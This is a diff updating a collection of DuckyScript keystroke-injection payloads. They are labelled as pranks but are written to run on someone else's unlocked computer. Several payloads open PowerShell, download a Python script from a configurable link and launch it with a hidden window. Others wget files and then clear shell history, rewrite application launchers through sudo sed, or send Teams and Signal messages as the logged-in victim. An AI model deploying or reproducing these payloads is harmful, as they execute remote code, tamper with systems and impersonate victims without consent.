REM Requirements:
|
|
||||||
REM - Internet Connection
|
|
||||||
REM - ExecutionPolicy Bypass
|
|
||||||
REM - Python
|
|
||||||
|
|
||||||
|
Requirements:
|
||||||
|
- Internet Connection
|
||||||
|
- ExecutionPolicy Bypass
|
||||||
|
- Python
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM REQUIRED - Set your Python script link
|
REM REQUIRED - Set your Python script link
|
||||||
DEFINE SCRIPT-PY-LINK example.com
|
DEFINE #SCRIPT-PY-LINK example.com
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
DELAY 1000
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
STRING powershell
|
STRINGLN powershell
|
||||||
ENTER
|
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
|
STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
|
||||||
STRING Invoke-WebRequest -Uri "
|
|
||||||
STRING SCRIPT-PY-LINK
|
|
||||||
STRING " -OutFile "script.py"
|
|
||||||
ENTER
|
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
|
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
|
||||||
|
|
|
@ -1,39 +1,58 @@
|
||||||
REM ###########################################
|
REM_BLOCK
|
||||||
REM # |
|
###########################################
|
||||||
REM # Title : Change Desktop Wallpaper |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Change Desktop Wallpaper #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Prank |
|
# Version : 1.1 #
|
||||||
REM # Target : Linux (KDE based) |
|
# Category : Prank #
|
||||||
REM # |
|
# Target : Linux (KDE based) #
|
||||||
REM ###########################################
|
# #
|
||||||
|
###########################################
|
||||||
|
|
||||||
REM Requirements:
|
Requirements:
|
||||||
REM - Internet Connection
|
- Internet Connection
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM Replace 'example.com/IMAGE_NAME' with your image link
|
||||||
|
DEFINE #IMAGE_LINK example.com/IMAGE_NAME
|
||||||
|
|
||||||
|
REM Replace example.jpg with the image path, for example /home/USERNAME/example.jpg
|
||||||
|
DEFINE #IMAGE_PATH="file://example.jpg"
|
||||||
|
|
||||||
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
|
TARGETS:
|
||||||
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #RESPONSE_DELAY 25
|
||||||
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
DELAY 1000
|
|
||||||
CTRL-ALT t
|
CTRL-ALT t
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
REM Replace 'example.com/IMAGE_NAME' with your image link
|
STRINGLN wget #IMAGE_LINK
|
||||||
DEFINE IMAGE_LINK example.com/IMAGE_NAME
|
|
||||||
STRING wget
|
|
||||||
STRING IMAGE_LINK
|
|
||||||
ENTER
|
|
||||||
|
|
||||||
REM Replace example.jpg with the image path, for example /home/USERNAME/example.jpg
|
|
||||||
DEFINE IMAGE_PATH="file://example.jpg"
|
|
||||||
|
|
||||||
REM It depends by the Internet Connection
|
REM It depends by the Internet Connection
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
STRING qdbus org.kde.plasmashell /PlasmaShell org.kde.PlasmaShell.evaluateScript 'var allDesktops = desktops();for (i=0;i<allDesktops.length;i++) {d = allDesktops[i]; d.wallpaperPlugin = "org.kde.image";d.currentConfigGroup = Array("Wallpaper", "org.kde.image", "General");d.writeConfig("Image", "
|
STRINGLN qdbus org.kde.plasmashell /PlasmaShell org.kde.PlasmaShell.evaluateScript 'var allDesktops = desktops();for (i=0;i<allDesktops.length;i++) {d = allDesktops[i]; d.wallpaperPlugin = "org.kde.image";d.currentConfigGroup = Array("Wallpaper", "org.kde.image", "General");d.writeConfig("Image", "#IMAGE_PATH")}'; rm -rf #IMAGE_PATH;history -c; exit;
|
||||||
STRING IMAGE_PATH
|
|
||||||
STRING ")}'
|
|
||||||
ENTER
|
|
||||||
DELAY 1000
|
|
||||||
|
|
||||||
STRING rm -rf
|
|
||||||
STRING IMAGE_PATH
|
|
||||||
STRING ;history -c; exit;
|
|
||||||
ENTER
|
|
|
@ -1,46 +1,65 @@
|
||||||
REM #######################################################
|
REM_BLOCK
|
||||||
REM # |
|
#######################################################
|
||||||
REM # Title : Change The App That Will Be Runned |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Change The App That Will Be Runned #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Prank |
|
# Version : 1.0 #
|
||||||
REM # Target : GNU/Linux (Debian based tested) |
|
# Category : Prank #
|
||||||
REM # |
|
# Target : GNU/Linux (Debian based tested) #
|
||||||
REM #######################################################
|
# #
|
||||||
|
#######################################################
|
||||||
|
|
||||||
REM Requirements:
|
|
||||||
REM - sudo permissions
|
|
||||||
|
|
||||||
|
Requirements:
|
||||||
|
- sudo permissions
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM You must know the original desktop name file, if you don't know it you can rich this information download the app on you system and going to /usr/share/applications/ searching this one app, i.e. the desktop file name of Signal application is signal-desktop.desktop, so in this case you should put signal-desktop.desktop
|
REM You must know the original desktop name file, if you don't know it you can rich this information download the app on you system and going to /usr/share/applications/ searching this one app, i.e. the desktop file name of Signal application is signal-desktop.desktop, so in this case you should put signal-desktop.desktop
|
||||||
DEFINE ORIGINAL_DESKTOP_FILE_NAME_1 example
|
DEFINE #ORIGINAL_DESKTOP_FILE_NAME_1 example
|
||||||
DEFINE ORIGINAL_DESKTOP_EXEC_COMMAND_1 example
|
DEFINE #ORIGINAL_DESKTOP_EXEC_COMMAND_1 example
|
||||||
DEFINE ORIGINAL_DESKTOP_FILE_NAME_2 example
|
DEFINE #ORIGINAL_DESKTOP_FILE_NAME_2 example
|
||||||
DEFINE ORIGINAL_DESKTOP_EXEC_COMMAND_2 example
|
DEFINE #ORIGINAL_DESKTOP_EXEC_COMMAND_2 example
|
||||||
|
|
||||||
REM sudo permissions needed
|
REM sudo permissions needed
|
||||||
DEFINE SUDO example
|
DEFINE #SUDO example
|
||||||
|
|
||||||
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
|
TARGETS:
|
||||||
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #RESPONSE_DELAY 25
|
||||||
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
REM Open a shell
|
REM Open a shell
|
||||||
DELAY 2000
|
|
||||||
CTRL-ALT t
|
CTRL-ALT t
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
|
|
||||||
STRING sudo sed -i '/^Exec=/s/.*/
|
STRINGLN sudo sed -i '/^Exec=/s/.*/ #ORIGINAL_DESKTOP_EXEC_COMMAND_2 /' #ORIGINAL_DESKTOP_FILE_NAME_1
|
||||||
STRING ORIGINAL_DESKTOP_EXEC_COMMAND_2
|
|
||||||
STRING /'
|
|
||||||
STRINGLN ORIGINAL_DESKTOP_FILE_NAME_1
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
|
|
||||||
STRING SUDO
|
STRINGLN #SUDO
|
||||||
ENTER
|
|
||||||
DELAY 4000
|
DELAY 4000
|
||||||
|
|
||||||
STRING sudo sed -i '/^Exec=/s/.*/
|
STRINGLN sudo sed -i '/^Exec=/s/.*/#ORIGINAL_DESKTOP_EXEC_COMMAND_1/' #ORIGINAL_DESKTOP_FILE_NAME_2
|
||||||
STRING ORIGINAL_DESKTOP_EXEC_COMMAND_1
|
|
||||||
STRING /'
|
|
||||||
STRINGLN ORIGINAL_DESKTOP_FILE_NAME_2
|
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
ALT f4
|
ALT f4
|
||||||
|
|
|
@ -1,27 +1,68 @@
|
||||||
REM ####################################################
|
REM_BLOCK
|
||||||
REM # |
|
####################################################
|
||||||
REM # Title : Continuos Print In Terminal |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Continuos Print In Terminal #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Prank |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10/11 |
|
# Category : Prank #
|
||||||
REM # |
|
# Target : Windows 10/11 #
|
||||||
REM ####################################################
|
# #
|
||||||
|
####################################################
|
||||||
|
|
||||||
|
Plug And Play <3
|
||||||
|
|
||||||
REM Plug And Play <3
|
Requirements:
|
||||||
|
- Internet Connection
|
||||||
|
- ExecutionPolicy Bypass
|
||||||
|
- Python
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
REM - Internet Connection
|
REM VERSION 1.1
|
||||||
REM - ExecutionPolicy Bypass
|
REM AUTHOR: Korben
|
||||||
REM - Python
|
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
DELAY 1000
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING powershell
|
STRINGLN powershell
|
||||||
ENTER
|
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
STRINGLN (New-Object -ComObject WScript.Shell).SendKeys("{F11}")
|
STRINGLN (New-Object -ComObject WScript.Shell).SendKeys("{F11}")
|
||||||
|
|
|
@ -1,36 +1,73 @@
|
||||||
|
REM_BLOCK
|
||||||
REM ############################################
|
############################################
|
||||||
REM # |
|
# #
|
||||||
REM # Title : Full-Screen Banner Joke |
|
# Title : Full-Screen Banner Joke #
|
||||||
REM # Author : Aleff |
|
# Author : Aleff #
|
||||||
REM # Version : 1.0 |
|
# Version : 1.0 #
|
||||||
REM # Category : Prank |
|
# Category : Prank #
|
||||||
REM # Target : Windows 10-11 |
|
# Target : Windows 10-11 #
|
||||||
REM # |
|
# #
|
||||||
REM ############################################
|
############################################
|
||||||
|
|
||||||
|
|
||||||
REM Requirements:
|
Requirements:
|
||||||
REM - Internet Connection
|
- Internet Connection
|
||||||
REM - Python installed
|
- Python installed
|
||||||
REM - ExecutionPolicy Bypass
|
- ExecutionPolicy Bypass
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM REQUIRED - Set your Python script link
|
REM REQUIRED - Set your Python script link
|
||||||
DEFINE SCRIPT-PY-LINK example.com
|
DEFINE #SCRIPT-PY-LINK example.com
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
DELAY 1000
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING powershell
|
STRINGLN powershell
|
||||||
ENTER
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
|
|
||||||
STRING Invoke-WebRequest -Uri "
|
STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
|
||||||
STRING SCRIPT-PY-LINK
|
|
||||||
STRING " -OutFile "script.py"
|
|
||||||
ENTER
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
|
|
||||||
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
|
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
|
||||||
|
|
|
@ -1,29 +1,69 @@
|
||||||
REM ##################################################
|
REM_BLOCK
|
||||||
REM # |
|
##################################################
|
||||||
REM # Title : Play A Song Through Spotify |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Play A Song Through Spotify #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Prank |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10-11 |
|
# Category : Prank #
|
||||||
REM # |
|
# Target : Windows 10-11 #
|
||||||
REM ##################################################
|
# #
|
||||||
|
##################################################
|
||||||
|
|
||||||
REM Requirements:
|
|
||||||
REM - Internet Connection
|
|
||||||
REM - Spotify installed and user logged-in
|
|
||||||
REM - ExecutionPolicy Bypass
|
|
||||||
|
|
||||||
|
Requirements:
|
||||||
|
- Internet Connection
|
||||||
|
- Spotify installed and user logged-in
|
||||||
|
- ExecutionPolicy Bypass
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM REQUIRED - Set your song name
|
REM REQUIRED - Set your song name
|
||||||
DEFINE SONG-NAME example
|
DEFINE #SONG-NAME example
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
DELAY 1000
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
STRING powershell
|
STRINGLN powershell
|
||||||
ENTER
|
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
STRINGLN Start-Process "spotify://"
|
STRINGLN Start-Process "spotify://"
|
||||||
|
@ -43,8 +83,7 @@ REM Some times popups of advertisements may come out and usually they will click
|
||||||
REM ESCAPE
|
REM ESCAPE
|
||||||
REM DELAY 500
|
REM DELAY 500
|
||||||
|
|
||||||
STRING SONG-NAME
|
STRINGLN #SONG-NAME
|
||||||
ENTER
|
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
TAB
|
TAB
|
||||||
DELAY 500
|
DELAY 500
|
||||||
|
|
|
@ -1,12 +1,14 @@
|
||||||
REM #####################################################
|
REM_BLOCK
|
||||||
REM # #
|
#####################################################
|
||||||
REM # Title : Prank In The Middle - Thunderbird #
|
# #
|
||||||
REM # Author : Aleff #
|
# Title : Prank In The Middle - Thunderbird #
|
||||||
REM # Version : 1.0 #
|
# Author : Aleff #
|
||||||
REM # Category : Prank #
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10/11 #
|
# Category : Prank #
|
||||||
REM # #
|
# Target : Windows 10/11 #
|
||||||
REM #####################################################
|
# #
|
||||||
|
#####################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
EXTENSION DETECT_READY
|
EXTENSION DETECT_READY
|
||||||
REM VERSION 1.1
|
REM VERSION 1.1
|
||||||
|
@ -38,8 +40,7 @@ END_EXTENSION
|
||||||
|
|
||||||
REM Open Thunderbird and goto settings
|
REM Open Thunderbird and goto settings
|
||||||
GUI r
|
GUI r
|
||||||
STRING thunderbird
|
STRINGLN thunderbird
|
||||||
ENTER
|
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
REPEAT 4 TAB
|
REPEAT 4 TAB
|
||||||
ENTER
|
ENTER
|
||||||
|
@ -70,8 +71,7 @@ DELAY 500
|
||||||
|
|
||||||
REM Open the powershell and goto the directory
|
REM Open the powershell and goto the directory
|
||||||
GUI r
|
GUI r
|
||||||
STRING powershell
|
STRINGLN powershell
|
||||||
ENTER
|
|
||||||
DELAY 1500
|
DELAY 1500
|
||||||
STRING cd
|
STRING cd
|
||||||
DELAY 500
|
DELAY 500
|
||||||
|
|
|
@ -1,37 +1,82 @@
|
||||||
REM ###########################################
|
REM_BLOCK
|
||||||
REM # |
|
###########################################
|
||||||
REM # Title : Send Messages In Teams |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Send Messages In Teams #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Prank |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10-11 |
|
# Category : Prank #
|
||||||
REM # |
|
# Target : Windows 10-11 #
|
||||||
REM ###########################################
|
# #
|
||||||
|
###########################################
|
||||||
|
|
||||||
REM Requirements:
|
Requirements:
|
||||||
REM - Microsoft Teams installed and user logged-in
|
- Microsoft Teams installed and user logged-in
|
||||||
REM - Internet Connection
|
- Internet Connection
|
||||||
REM - ExecutionPolicy Bypass
|
- ExecutionPolicy Bypass
|
||||||
REM - Python
|
- Python
|
||||||
|
|
||||||
REM 1. Open a powershell
|
1. Open a powershell
|
||||||
REM 2. Close if Teams is opens and reopen it
|
2. Close if Teams is opens and reopen it
|
||||||
REM 3. Goto search bar
|
3. Goto search bar
|
||||||
REM 4. Search the person by name, email, id or what you want...
|
4. Search the person by name, email, id or what you want...
|
||||||
REM 5. Downarrow and enter to open the chat
|
5. Downarrow and enter to open the chat
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM REQUIRED - Name, email, id or what you want for contact the target
|
REM REQUIRED - Name, email, id or what you want for contact the target
|
||||||
DEFINE USER-ID example
|
DEFINE #USER-ID example
|
||||||
REM REQUIRED - Messages
|
|
||||||
DEFINE MESSAGE1 example
|
REM REQUIRED - Messages
|
||||||
REM ...
|
DEFINE #MESSAGE1 example
|
||||||
REM DEFINE MESSAGEN example..
|
|
||||||
|
REM ...
|
||||||
|
REM DEFINE #MESSAGEN example..
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
DELAY 1000
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
STRING powershell
|
STRINGLN powershell
|
||||||
ENTER
|
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
REM #### Powershell ####
|
REM #### Powershell ####
|
||||||
|
@ -44,8 +89,7 @@ DELAY 10000
|
||||||
REM #### Teams ####
|
REM #### Teams ####
|
||||||
CTRL N
|
CTRL N
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
STRING USER-ID
|
STRINGLN #USER-ID
|
||||||
ENTER
|
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
TAB
|
TAB
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
|
@ -53,11 +97,10 @@ TAB
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
|
|
||||||
REM #### Messages ####
|
REM #### Messages ####
|
||||||
STRING MESSAGE1
|
STRINGLN #MESSAGE1
|
||||||
ENTER
|
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
REM ...
|
REM ...
|
||||||
REM STRINGLN MESSAGEN
|
REM STRINGLN #MESSAGEN
|
||||||
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
ALT F4
|
ALT F4
|
||||||
|
|
|
@ -1,41 +1,83 @@
|
||||||
REM #########################################
|
REM_BLOCK
|
||||||
REM # |
|
#########################################
|
||||||
REM # Title : Send Signal Messages |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Send Signal Messages #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Prank, Execution |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10-11 |
|
# Category : Prank, Execution #
|
||||||
REM # |
|
# Target : Windows 10-11 #
|
||||||
REM #########################################
|
# #
|
||||||
|
#########################################
|
||||||
|
|
||||||
REM Requirements:
|
Requirements:
|
||||||
REM - Internet Connection
|
- Internet Connection
|
||||||
REM - Signal App installed
|
- Signal App installed
|
||||||
REM Payload Plug-And-Play but can be edited as you want the message
|
Payload Plug-And-Play but can be edited as you want the message
|
||||||
|
END_REM
|
||||||
|
|
||||||
